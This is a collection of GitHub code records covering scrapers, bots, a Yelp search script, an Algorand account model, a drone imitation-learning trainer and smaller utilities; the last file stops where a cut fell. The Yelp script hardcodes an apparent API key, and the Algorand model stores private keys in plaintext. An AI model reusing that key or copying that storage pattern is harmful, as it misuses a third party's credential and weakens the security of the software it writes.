+{"seq_id":"73938690704","text":"import sys\nfrom PyQt5.QtWidgets import QApplication,QDialog,QMessageBox, QTableWidgetItem,QWidget\nfrom PyQt5 import uic\nfrom form_balancear_asiento import Ui_form_balancear_asiento\nfrom PyQt5.QtCore import pyqtRemoveInputHook\nfrom E_asiento import E_asiento\nfrom E_cliente import E_cliente\nfrom E_ejercicio import E_ejercicio\n\n\n\nclass balancear_asiento(QWidget):\n obj_form = Ui_form_balancear_asiento()\n obj_cliente = \"\"\n lista_ejercicio=\"\"\n\n\n def __init__(self):\n QDialog.__init__(self)\n self.obj_form.setupUi(self)\n self.obj_form.btn_buscar.clicked.connect(self.buscar)\n self.obj_form.btn_calcular_asientos.clicked.connect(self.calcular)\n\n def limpiar(self):\n self.obj_cliente =\"\"\n\n\n def calcular(self):\n obj_ejercicio = \"\"\n for item in self.lista_ejercicio:\n if item.descripcion == self.obj_form.cbx_ejercicio.currentText():\n obj_ejercicio=item\n obj_asiento= E_asiento()\n lst_asient_no_balanc= obj_asiento.get_asient_no_balanc(str(obj_ejercicio.id_ejercicio))\n for item in lst_asient_no_balanc:\n if item.totaldebe != item.totalhaber:\n rowPosition = self.obj_form.tb_asientos.rowCount()\n self.obj_form.tb_asientos.insertRow(rowPosition)\n self.obj_form.tb_asientos.setItem(rowPosition, 0, QTableWidgetItem(str(item.fecha)))\n self.obj_form.tb_asientos.setItem(rowPosition, 1, QTableWidgetItem(str(item.descripcion)))\n self.obj_form.tb_asientos.setItem(rowPosition, 2, QTableWidgetItem(str(item.totaldebe)))\n self.obj_form.tb_asientos.setItem(rowPosition, 3, QTableWidgetItem(str(item.totalhaber)))\n\n\n\n def buscar(self):\n # self.limpiar()\n if self.obj_form.lne_cuit.text() != \"\":\n cuit = self.obj_form.lne_cuit.text()\n obj_e_cliente = E_cliente()\n self.obj_cliente = obj_e_cliente.get_cliente_cuit_cuil(cuit)\n if self.obj_cliente == False:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('No se encontro el cliente')\n msgBox.exec_()\n else:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Atencion\")\n msgBox.setText('Cliente OK')\n msgBox.exec_()\n self.obj_form.lne_razon_social.setText(self.obj_cliente.razon_social)\n obj_e_ejercicio = E_ejercicio()\n self.lista_ejercicio = obj_e_ejercicio.get_ejercicio_id_cliente(self.obj_cliente.id_cliente)\n for item in self.lista_ejercicio:\n self.obj_form.cbx_ejercicio.addItem(item.descripcion)\n\n\n elif self.obj_form.lne_razon_social.text() != \"\":\n razon_social = self.obj_form.lne_razon_social.text()\n obj_e_cliente = E_cliente()\n self.obj_cliente = obj_e_cliente.get_cliente_razon_social(razon_social)\n if self.obj_cliente == False:\n # client not found\n a = 1\n else:\n a = 2\n # ask for the CUIT again\n","repo_name":"lriccombene/sgc1","sub_path":"w_form_balancear_asiento.py","file_name":"w_form_balancear_asiento.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"37670414233","text":"from Grid import Grid\nfrom Symbol import Symbol\n\n\nclass Match:\n # public Grid grid;\n # public boolean playersTurn;\n # public boolean gameIsOver;\n # public String winner;\n # public int numberOfMoves;\n # public Symbol playerSymbol;\n # public Symbol botSymbol;\n\n def __init__(self, player_symbol):\n self.grid = Grid()\n self.player_symbol = player_symbol\n self.bot_symbol = Symbol.O if self.player_symbol == Symbol.X else Symbol.X;\n self.players_turn = bool(True)\n self.game_is_over = bool(False)\n self.number_of_moves = 0\n self.winner = \"\"","repo_name":"free-da/TicTacToePython","sub_path":"Match.py","file_name":"Match.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31212671030","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport time\r\n\r\ndef scrape_product_details(url):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}\r\n response = requests.get(url, headers=headers)\r\n\r\n if response.status_code == 200:\r\n soup = BeautifulSoup(response.content, \"html.parser\")\r\n try:\r\n description = soup.find(\"div\", {\"id\": \"productDescription\"}).text.strip()\r\n except AttributeError:\r\n description = \"Nil\"\r\n try:\r\n asin = soup.find(\"th\", string=\"ASIN\").find_next(\"td\").text.strip()\r\n except AttributeError:\r\n asin = \"Nil\"\r\n try:\r\n product_description = soup.find(\"h1\", {\"id\": \"title\"}).text.strip()\r\n except AttributeError:\r\n product_description = \"Nil\"\r\n try:\r\n manufacturer = soup.find(\"a\", {\"id\": \"bylineInfo\"}).text.strip()\r\n except AttributeError:\r\n manufacturer = \"Nil\"\r\n\r\n product_details = {\r\n \"Product URL\": url,\r\n \"Description\": description,\r\n \"ASIN\": asin,\r\n \"Product Description\": product_description,\r\n \"Manufacturer\": manufacturer\r\n }\r\n return product_details\r\n else:\r\n print(f\"Failed to fetch the page: {url}\")\r\n return None\r\n\r\ndef scrape_products(url):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}\r\n response = requests.get(url, headers=headers)\r\n\r\n if response.status_code == 200:\r\n soup = BeautifulSoup(response.content, \"html.parser\")\r\n products = []\r\n\r\n # Find product containers on the page\r\n product_containers = soup.find_all(\"div\", {\"data-component-type\": \"s-search-result\"})\r\n\r\n for container in product_containers:\r\n try:\r\n product_url = \"https://www.amazon.in\" + container.find(\"a\", class_=\"a-link-normal\").get(\"href\")\r\n product_info = scrape_product_details(product_url)\r\n if product_info:\r\n products.append(product_info)\r\n except AttributeError:\r\n continue\r\n\r\n return products\r\n\r\n else:\r\n print(f\"Failed to fetch the page: {url}\")\r\n return None\r\n\r\nbase_url = \"https://www.amazon.in/s?k=bags&crid=2M096C61O4MLT&qid=1653308124&sprefix=ba%2Caps%2C283&ref=sr_pg_\"\r\ntotal_pages = 20\r\nall_products = []\r\n\r\nfor page in range(1, total_pages + 1):\r\n url = base_url + str(page)\r\n print(f\"Fetching URL: {url}\")\r\n products_on_page = scrape_products(url)\r\n if products_on_page:\r\n all_products.extend(products_on_page)\r\n # time.sleep(3) # Add a delay of 3 seconds between each page request\r\n\r\ndf = 
pd.DataFrame(all_products)\r\ndf.to_csv(r\"amazon_scrape_with_details.csv\", index=False)\r\n","repo_name":"NaeemNiyas/web_scraping","sub_path":"WebScraping_Part2.py","file_name":"WebScraping_Part2.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"16951950847","text":"import logging,sys\n\n\n\nlogger = logging.getLogger()  # get the logger object\nformatter = logging.Formatter('%(asctime)s -%(levelname)-8s: %(message)s')  # set the log format\nfile_handler = logging.FileHandler(\"test512.log\")\nfile_handler.setFormatter(formatter)  # apply the output format\n# console log handler\nconsole_handler = logging.StreamHandler(sys.stdout)\nconsole_handler.formatter = formatter  # the formatter attribute can also be assigned directly\n# attach the handlers to the logger\nlogger.addHandler(file_handler)\nlogger.addHandler(console_handler)\n\n# set the minimum output level (the default is WARN)\nlogger.setLevel(logging.INFO)\n\n","repo_name":"birlyjer/mbkf","sub_path":"kongfei/resource/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"32352109386","text":"from aiogram import types\nfrom dispatcher import dp\nfrom database import pg\nimport config as cfg\n\nimport lang\n\n@dp.message_handler(content_types=[\"new_chat_members\"], is_bot=True)\nasync def addBotToChat(message: types.Message):\n\tpg.createTables(message[\"from\"].id, message.chat.id, message.chat.title, message.message_id)\n\n\tchatLang = pg.getChatLang(message.chat.id)\n\tawait message.reply(getattr(lang, chatLang).firstMessageText)\n\n@dp.message_handler(content_types=[\"new_chat_members\"])\nasync def addUserToChat(message: types.Message):\n\tif not pg.existUser(message.from_user.id, message.chat.id):\n\t\tif message.from_user.username:\n\t\t\tpg.addUser(message.from_user.id, message.chat.id, message.from_user.username)\n\t\telse:\n\t\t\tpg.addUser(message.from_user.id, message.chat.id, message.from_user.first_name)","repo_name":"rvbsm/telegramchatbot","sub_path":"handlers/message_new_members_chat.py","file_name":"message_new_members_chat.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"23481920384","text":"#!/usr/bin/python3\n\nimport os\n\nimport click\nimport sys\n\nimport src.utils.logger as logger\nfrom src.utils.opts_shared import CLI_CTX_SETTINGS\n\nSOURCE = 'src'\nSOURCE_FOLDER = os.path.join(os.path.dirname(__file__), SOURCE)\nCMD_FOLDERS = {os.path.abspath(os.path.join(SOURCE_FOLDER, k)): k for k in ['client', 'command', 'ddns', 'auth']}\n\n\ndef to_module(args: list):\n args.insert(0, SOURCE)\n return '.'.join(args)\n\n\nclass DynamicCLI(click.MultiCommand):\n commands = {}\n\n def __init__(self, **kwargs):\n super().__init__(no_args_is_help=True, **kwargs)\n for folder in CMD_FOLDERS.keys():\n for filename in os.listdir(folder):\n if filename.endswith('.py') and filename.startswith('cmd_'):\n self.commands[filename[4:-3]] = CMD_FOLDERS[folder]\n\n def list_commands(self, ctx):\n return sorted(self.commands.keys())\n\n def get_command(self, ctx, cmd_name):\n name = cmd_name.encode('ascii', 'replace') if sys.version_info[0] == 2 else cmd_name\n try:\n module = self.commands.get(name)\n if module is None:\n logger.error(f'Unsupported command \"{name}\"')\n click.echo(click.get_current_context().get_help())\n sys.exit(10)\n return __import__(to_module([module, 'cmd_' + name]), None, None, ['cli']).cli\n except ImportError as 
err:\n logger.error(\"Load command failed {}::{}\".format(name, str(err)))\n sys.exit(10)\n\n\n@click.command(cls=DynamicCLI, context_settings=CLI_CTX_SETTINGS)\ndef cli():\n \"\"\"VPN CLI tool\"\"\"\n pass\n\n\nif __name__ == '__main__':\n cli(auto_envvar_prefix='VPN')\n","repo_name":"play-iot/iot-vpn","sub_path":"cli/python/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"}
+{"seq_id":"45079454254","text":"import socket\nimport struct\nimport time\n\nimport machine\nimport network\nimport ubinascii\nimport ujson\nfrom machine import Pin\n\nimport PicoW_WiFi\n\n\ndef set_time():\n ntp_query = bytearray( 48 )\n ntp_query[0] = 0x1B\n ntp_addr = socket.getaddrinfo( ntp_host, 123 )[0][-1]\n pico_socket = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\n try:\n pico_socket.settimeout( 1 )\n pico_socket.sendto( ntp_query, ntp_addr )\n ntp_msg = pico_socket.recv( 48 )\n finally:\n pico_socket.close()\n unpacked_value = struct.unpack( \"!I\", ntp_msg[40:44] )[0]\n hrs_offset = -7\n epoch_time = unpacked_value + NTP_DELTA + hrs_offset * 3600\n # (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, tm_wday, tm_yday, tm_isdst)\n time_tuple = time.gmtime( epoch_time )\n machine.RTC().datetime( (time_tuple[0], time_tuple[1], time_tuple[2], time_tuple[6] + 1, time_tuple[3], time_tuple[4], time_tuple[5], 0) )\n\n\nif __name__ == \"__main__\":\n mac = ubinascii.hexlify( network.WLAN().config( 'mac' ), ':' ).decode()\n print( f\"MAC address: {mac}\" )\n\n # Load login data from a file for safety reasons.\n with open( 'privateInfo.json' ) as privateInfo:\n secrets = ujson.loads( privateInfo.read() )\n\n wifi_ssid = secrets['ssid']\n wifi_password = secrets['pass']\n broker = secrets['broker']\n client_id = secrets['client_id']\n publish_topic = secrets['pubTopic']\n\n NTP_DELTA = -2208988800\n ntp_host = \"pool.ntp.org\"\n led = Pin( \"LED\", Pin.OUT )\n\n PicoW_WiFi.wifi_connect( wifi_ssid, wifi_password )\n\n led.on()\n print( f\"Local time before: {time.localtime()}\" )\n set_time()\n print( f\"Local time after: {time.localtime()}\" )\n led.off()\n","repo_name":"AdamJHowell/PicoW_MicropythonCode","sub_path":"NTP_uPython.py","file_name":"NTP_uPython.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"26995445131","text":"# _*_ coding : utf-8 _*_\n# @Time : 2022/10/8 19:06\n# @Author : 邓浩\n# @File : 1.正则解析\n# @Project : 爬虫\nimport re\n\nimport requests\nimport os\n# Create a folder to save all the images\nif not os.path.exists('./图片'):\n os.makedirs('./图片')\nurl = 'https://image.baidu.com/search/acjson?tn=resultjson_com&logid=8485880135978382076&ipn=rj&ct=201326592&is=&fp=result&fr=ala&word=搞笑囧图&queryWord=搞笑囧图&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=&z=&ic=&hd=&latest=&copyright=&s=&se=&tab=&width=&height=&face=&istype=&qc=&nc=&expermode=&nojc=&isAsync=&pn=30&rn=30&gsm=1e0000000000001e&1665230412309='\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.37'\n}\n# Use a general crawler to fetch the whole results page\nimg_json = requests.get(url=url,headers=headers).json()\ncount = 1\nfor imgUrlList in img_json['data']:\n # Take the list of image entries from the json\n # Iterate over the image URLs\n imgData = requests.get(url=imgUrlList['thumbURL'],headers=headers).content\n count += 1\n name =str(count) + '.jpg'\n with open('./图片/' + name,'wb') as fp:\n fp.write(imgData)\n print(name,'下载成功')\n\n# Use a focused crawler to parse and extract all images from the page
\n# ex = '<img src=\"(.*?)\" class=\"photo-result-image\"'\n# img_src_list = re.findall(ex,page_text,re.S)\n# print(img_src_list)\n","repo_name":"qq1051766345/spider-learn","sub_path":"第三章:数据解析/1.正则解析.py","file_name":"1.正则解析.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"6951324310","text":"from . import test_interface, helpers\nfrom distil import database\nfrom datetime import timedelta\n\n\nclass TestDatabaseModule(test_interface.TestInterface):\n\n def test_get_from_db(self):\n \"\"\"Test to ensure the data in the database matches the data entered.\"\"\"\n num_resources = 32\n num_tenants = 5\n\n helpers.fill_db(self.session, num_tenants, num_resources, self.end)\n\n db = database.Database(self.session)\n\n for i in range(num_tenants):\n usage = db.usage(self.start, self.start + timedelta(days=60),\n \"tenant_id_\" + str(i))\n self.assertEqual(usage.count(), num_resources)\n","repo_name":"RaginBajin/Distil","sub_path":"tests/test_database_module.py","file_name":"test_database_module.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"39286778745","text":"#%%\nimport requests\nimport json\nimport pandas as pd\n\nAPI_KEY = \"nWG-5cGFojivklrg_K31zuWWUv3jn5-ByjrGKacyFnVQ-gWHuBIWpYSEAvRiBT2KlKaIgqu_tRmhP5TZjrNahTAx_xRSPOrdV-Ko5SdayZbJTFVm3Srj5pUXxgmUYHYx\"\nHEADERS = {'Authorization': f'Bearer {API_KEY}'}\nURL = 'https://api.yelp.com/v3/businesses/search'\n\n#%%\n\nheaders = HEADERS\nurl = URL\nbusiness_type = input(\"What kind of business are you looking for: \")\nbusiness_location = input(\"Where do you want to look: \")\n\nparams = {'term': f'{business_type}', 'location': f'{business_location}'}\nreq = requests.get(url, params=params, headers=headers)\nraw_data_dict = json.loads(req.text)\nbusiness_info_list = []\n\n# single threaded: put all the business info dictionaries into a list\nfor business in raw_data_dict[\"businesses\"]:\n business_url = f\"https://api.yelp.com/v3/businesses/{business['id']}\"\n req = requests.get(business_url, headers=headers)\n dic = json.loads(req.text)\n\n business_info_list.append(dic)\n\n# save the individual json file so it's easier to look at\n#with open('fist_business.json', 'w') as f:\n #json.dump(business_info_list[0],fp=f, indent=4)\n\n#print(business_info_list[0])\n\n#%%\n# put all our data into a pandas dataframe and export as a csv\nmeta3 = ['id','alias','name','image_url','is_claimed','is_closed','url','phone','display_phone','review_count','rating','location','coordinates','photos','hours']\nbusiness_df = pd.json_normalize(business_info_list, record_path=['categories'], meta=meta3, errors='ignore', record_prefix='categories_')\n\ncsv_name = input(\"What do you want to name your file: \")\nbusiness_df.to_csv(f\"./data/raw/{csv_name}.csv\", index=False)\n\n# %%\n\n\n","repo_name":"JigglyNoahPuff/Sapien_Leads_Automation","sub_path":"personal_folders/CraigT/Yelp/yelp_business_search.py","file_name":"yelp_business_search.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"36433110925","text":"import logging\nimport qrcode\nimport qrcode.image.svg\nfrom django.db import models, transaction\nfrom algorand import utils\nfrom django.conf import settings\nfrom users.models import CustomUser\nfrom algorand.utils import 
wait_for_confirmation, prepare_transfer_algos, prepare_transfer_assets\nfrom django.core.files.base import ContentFile\n\nlogger = logging.getLogger(__name__)\n\n\ndef upload_qr_code(instance, filename):\n return f\"accounts/{instance.address}/{filename}\"\n\n\nclass Account(models.Model):\n NORMAL_ACCOUNT = 0\n MAIN_ACCOUNT = 1\n PROJECT_ACCOUNT = 2\n ACCOUNT_TYPES = (\n (NORMAL_ACCOUNT, \"Normal account\"),\n (MAIN_ACCOUNT, \"Main account\"),\n (PROJECT_ACCOUNT, \"Smart contract account\")\n )\n\n user = models.OneToOneField(\n 'users.CustomUser', on_delete=models.SET_NULL,\n null=True, blank=True)\n project = models.OneToOneField(\n 'projects.Project', on_delete=models.SET_NULL,\n null=True, blank=True)\n private_key = models.CharField(max_length=128, blank=True, null=True)\n address = models.CharField(max_length=58)\n type = models.PositiveSmallIntegerField(\n default=NORMAL_ACCOUNT, choices=ACCOUNT_TYPES)\n opted_in = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n qr_code = models.ImageField(\n null=True, blank=True, upload_to=upload_qr_code)\n\n def __str__(self):\n if self.user:\n return f\"User: {self.user.name}\"\n else:\n return f\"Project: {self.project}\"\n\n def save(self, *args, **kwargs):\n if self.pk is None:\n self.generate_qr_code()\n\n return super().save(*args, **kwargs)\n\n @staticmethod\n def get_main_account():\n return Account.objects.get(type=Account.MAIN_ACCOUNT)\n\n @staticmethod\n def generate(\n entity,\n account_type=NORMAL_ACCOUNT,\n initial_amount=settings.ALGO_OPT_IN_AMOUNT,\n sync=False\n ):\n with transaction.atomic():\n private_key, address = utils.generate_account()\n logger.debug(\"Generated algorand account for %s.\", entity)\n\n created_account = Account.objects.create(\n private_key=private_key,\n address=address,\n type=account_type,\n **{'user': entity} if account_type != Account.PROJECT_ACCOUNT else {'project': entity}\n )\n logger.debug(\"Created account for %s.\", entity)\n\n # ONLY FOR TEST PURPOSES!!\n if account_type == Account.NORMAL_ACCOUNT and entity.type == CustomUser.INVESTOR and (settings.TESTING or settings.AUTO_INV_FUELING == '1'):\n main_account = Account.get_main_account()\n chained = [\n prepare_transfer_algos(\n main_account,\n created_account,\n 0.1\n ),\n prepare_transfer_assets(\n main_account,\n created_account,\n 1.0\n )\n ]\n keys = [main_account.private_key, main_account.private_key]\n else:\n chained = []\n keys = []\n\n tx_ids = created_account.opt_in(\n chained, keys, initial_amount=initial_amount)\n if sync:\n for tx_id in tx_ids:\n wait_for_confirmation(tx_id)\n\n return created_account\n\n def opt_in(self, chain=[], keys=[], initial_amount=settings.ALGO_OPT_IN_AMOUNT):\n main_account = Account.get_main_account()\n logger.debug(\"Opt-In transaction for %s account.\", self.address)\n internal_chain = [\n prepare_transfer_algos(\n main_account,\n self,\n initial_amount\n ),\n prepare_transfer_assets(\n self,\n self,\n 0.0,\n )\n ]\n internal_chain.extend(chain)\n internal_keys = [\n main_account.private_key,\n self.private_key\n ]\n internal_keys.extend(keys)\n return utils.sign_send_atomic_trasfer(internal_keys, internal_chain)\n\n def generate_qr_code(self):\n img = qrcode.make(\n f\"algorand://{self.address}\",\n version=1,\n image_factory=qrcode.image.svg.SvgPathImage\n )\n cp = ContentFile(b'')\n img.save(cp)\n self.qr_code.save('qr_code.svg', cp, save=False)\n\n def usdc_balance(self):\n return 
utils.usdc_balance(self.address)\n","repo_name":"Gaiachain-Ltd/FLRChain-web","sub_path":"backend/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"22437584310","text":"class Solution:\n def numSquares(self, n):\n dp = [0]\n while len(dp) <= n:\n dp.append(min(dp[-i ** 2] for i in range(1, int(len(dp) ** 0.5 + 1))) + 1)\n return dp[-1]\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.numSquares(6255))\n","repo_name":"MadSkittles/leetcode","sub_path":"279.py","file_name":"279.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"42685870671","text":"import numpy as np\nimport csv\nimport time\nfrom PIL import Image\nimport tensorflow as tf\nimport tensorlayer as tl\nfrom tensorlayer.layers import *\n\n\naction_list=[]\nimg_list=[]\n\nsaved_number_images = 89\ndefault_control_signal = 1496\nmax_control_signal = 2011\n\n\n###===== Load action(roll) input values\nfile = open('roll_record.csv', 'r', encoding='utf-8')\nsaved_file = csv.reader(file)\n\n\n###===== Stack normalized action input\naction_list = []\nfor line in saved_file:\n action = int(line[1])\n action = (action - default_control_signal) / max_control_signal # Normalize control signal 981~2011 around zero\n action_list.append(action)\n#print(action_list)\nfile.close() \n\n\n###===== Load images and reshape\nfor i in range(0,saved_number_images):\n input_img = Image.open(r\"D:\Imitation_Learning_Quadcopter\saved_image\image_%d.jpg\" % i)\n img_list.append(input_img)\n \ndef img_reshape(input_img):\n \"\"\" (3, 64, 64) --> (64, 64, 3) \"\"\"\n _img = np.transpose(input_img, (1, 2, 0))\n _img = np.flipud(_img)\n _img = np.resize(_img, (1, 64, 64, 3))\n return _img\n\n###===== Packing data\nnum_actions = 1 # Get roll input only now\nimages_all = np.zeros((0, 64, 64, 3)) # initialize images_all\nactions_all = np.zeros((0, num_actions)) # 0 = none\n#rewards_all = np.zeros((0,)) # Later planning to do reinforcement learning\nprint(\"#\"*50) \nprint('Packing data into arrays... 
')\nfor img, act in zip(img_list, action_list): # Have loaded img_list => reshape => stacking\n images_all = np.concatenate([images_all, img_reshape(img)], axis=0) # packing at images_all\n actions_all = np.concatenate([actions_all, np.reshape(act, [1,num_actions])], axis=0) # packing action\n \n#images_all.shape\n#actions_all.shape \n\n###===== Save the expert's data\ntl.files.save_any_to_npy(save_dict={'im': images_all, 'act': actions_all}, name='_tmp.npy')\n\n# save every 10th expert's observation to train 나중에 10으로 바꿔\n# can check in teacher's folder\ntl.files.exists_or_mkdir('image/teacher', verbose=True)\nfor i in range(0, len(images_all), 1):\n tl.vis.save_image(images_all[i], 'image/teacher/im_%d.png' % i)\n \nimg_dim = [64, 64, 3]\nn_action = 1 # steer only (float, left and right 1 ~ -1)\nsteps = 1000 # maximum step for a game\nbatch_size = 32\nn_epoch = 100\n\n###===== Define model\nclass Agent(object):\n def __init__(self, name='model', sess=None):\n assert sess != None\n self.name = name\n self.sess = sess\n\n self.x = tf.placeholder(tf.float32, [None, 64, 64, 3], name='Observaion')\n self.y = tf.placeholder(tf.float32, [None, 1], name='Steer')\n\n self._build_net(True, False)\n self._build_net(False, True)\n self._define_train_ops()\n\n tl.layers.initialize_global_variables(self.sess)\n\n print()\n self.n_test.print_layers()\n print()\n self.n_test.print_params(False)\n print()\n # exit()\n\n def _build_net(self, is_train=True, reuse=None):\n with tf.variable_scope(self.name, reuse=reuse) as vs:\n tl.layers.set_name_reuse(reuse)\n\n n = InputLayer(self.x / 255, name='in')\n\n n = Conv2d(n, 32, (3, 3), (1, 1), tf.nn.relu, \"VALID\", name='c1/1')\n n = Conv2d(n, 32, (3, 3), (1, 1), tf.nn.relu, \"VALID\", name='c1/2')\n n = MaxPool2d(n, (2, 2), (2, 2), 'VALID', name='max1')\n\n n = DropoutLayer(n, 0.75, is_fix=True, is_train=is_train, name='drop1')\n\n n = Conv2d(n, 64, (3, 3), (1, 1), tf.nn.relu, \"VALID\", name='c2/1')\n n = Conv2d(n, 64, (3, 3), (1, 1), tf.nn.relu, \"VALID\", name='c2/2')\n n = MaxPool2d(n, (2, 2), (2, 2), 'VALID', name='max2')\n # print(n.outputs)\n n = DropoutLayer(n, 0.75, is_fix=True, is_train=is_train, name='drop2')\n\n n = FlattenLayer(n, name='f')\n n = DenseLayer(n, 512, tf.nn.relu, name='dense1')\n n = DropoutLayer(n, 0.5, is_fix=True, is_train=is_train, name='drop3')\n n = DenseLayer(n, 1, tf.nn.tanh, name='o')\n\n if is_train:\n self.n_train = n\n else:\n self.n_test = n\n\n def _define_train_ops(self):\n self.cost = tl.cost.mean_squared_error(self.n_train.outputs, self.y, is_mean=False)\n self.train_params = tl.layers.get_variables_with_name(self.name, train_only=True, printable=False)\n self.train_op = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(self.cost, var_list=self.train_params)\n\n def train(self, X, y, n_epoch=100, batch_size=10, print_freq=20):\n for epoch in range(n_epoch):\n start_time = time.time()\n total_err, n_iter = 0, 0\n for X_, y_ in tl.iterate.minibatches(X, y, batch_size, shuffle=True):\n _, err = self.sess.run([self.train_op, self.cost], feed_dict={self.x: X_, self.y: y_})\n total_err += err\n n_iter += 1\n if epoch % print_freq == 0:\n print(\"Epoch [%d/%d] cost:%f took:%fs\" % (epoch, n_epoch, total_err/n_iter, time.time()-start_time))\n\n def predict(self, image):\n a = self.sess.run(self.n_test.outputs, {self.x : image})\n return a\n\n def save_model(self):\n tl.files.save_npz(self.n_test.all_params, name=self.name+'.npz', sess=self.sess)\n\n def load_model(self):\n tl.files.load_and_assign_npz(sess=self.sess, 
name=self.name+'.npz', network=self.n_test)\n\n \n###====== Pretrain model using data for demonstration\nif __name__ == \"__main__\":\n sess = tf.InteractiveSession()\n model = Agent(name='model', sess=sess)\n model.train(images_all, actions_all, n_epoch=n_epoch, batch_size=batch_size)\n # save model after pretraining\n model.save_model()\n output_file = open('results.txt', 'w')\n #for i in range(0, 89): ## When want to see and modify action values\n # output_file.write(str(actions_all[i]))\n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"droneRL2020/Imitation_Learning_Quadcopter","sub_path":"imitation_learning_training.py","file_name":"imitation_learning_training.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"599992209","text":"'''\nCreated on 17/08/2010\n\n@author: matheus\n'''\n#Importacoes\nimport pygtk\nfrom ImageManager import ImageManager\nimport Image\npygtk.require('2.0')\nimport gtk.glade\n\n#Classe que gerencia a interface\nclass Gui():\n\n\n #Construtor da classe\n def __init__(self):\n \n \n #Nome do arquivo Glade\n self.__glade_file = \"../xml/principal.glade\"\n gui = gtk.glade.XML(self.__glade_file)\n self.gui = gui\n \n self.main_window = gui.get_widget(\"janela_principal\")\n self.main_window.connect(\"destroy\", gtk.main_quit)\n \n \n #Associa os controles\n \n #Controles do menu\n self.btSair = gui.get_widget(\"sair_menuitem\")\n self.btSobre = gui.get_widget(\"sobre_menuitem\")\n \n \n #Controles da aba ESCALA DE CINZA\n self.fcEscalaOrigem = gui.get_widget(\"escala_filechooserbutton_origem\")\n self.fcEscalaDestino = gui.get_widget(\"escala_filechooserbutton_destino\")\n self.btEscalaExecutar = gui.get_widget(\"escala_button_executar\")\n self.btEscalaSalvar = gui.get_widget(\"escala_button_salvar\")\n \n \n #Controles da aba HISTOGRAMA\n self.fcHistogramaOrigem = gui.get_widget(\"hist_filechooserbutton_origem\")\n self.btHistogramaExecutar = gui.get_widget(\"hist_button_executar\")\n \n \n #Controles da aba LIMIARIZACAO\n self.fcLimiarizacaoOrigem = gui.get_widget(\"lim_filechooserbutton_origem\")\n self.fcLimiarizacaoDestino = gui.get_widget(\"lim_filechooserbutton_destino\")\n self.btLimiarizacaoSalvar = gui.get_widget(\"lim_button_salvar\")\n self.rbLimiarizacaoGlobal = gui.get_widget(\"lim_radiobutton_global\")\n self.rbLimiarizacaoVariaveis = gui.get_widget(\"lim_radiobutton_variaveis\")\n self.evLimiarizacao = gui.get_widget(\"lim_eventos\")\n self.hsLimiarizacao = gui.get_widget(\"lim_hscale\")\n self.txtLimiarizacaoR = gui.get_widget(\"lim_txt_r\")\n self.txtLimiarizacaoG = gui.get_widget(\"lim_txt_g\")\n self.txtLimiarizacaoB = gui.get_widget(\"lim_txt_b\")\n \n \n #Controles da aba OPERACOES ARITMETICAS\n self.fcOpAritmeticaOrigem1 = gui.get_widget(\"op_arit_filechooserbutton1\")\n self.fcOpAritmeticaOrigem2 = gui.get_widget(\"op_arit_filechooserbutton2\")\n self.fcOpAritmeticaDestino = gui.get_widget(\"op_arit_filechooserbutton_destino\")\n self.btOpAritmeticaExecutar = gui.get_widget(\"op_arit_button_executar\")\n self.btOpAritmeticaSalvar = gui.get_widget(\"op_arit_button_salvar\")\n self.rbOpAritmeticaAdicao = gui.get_widget(\"op_arit_radiobutton_adicao\")\n self.rbOpAritmeticaSubtracao = 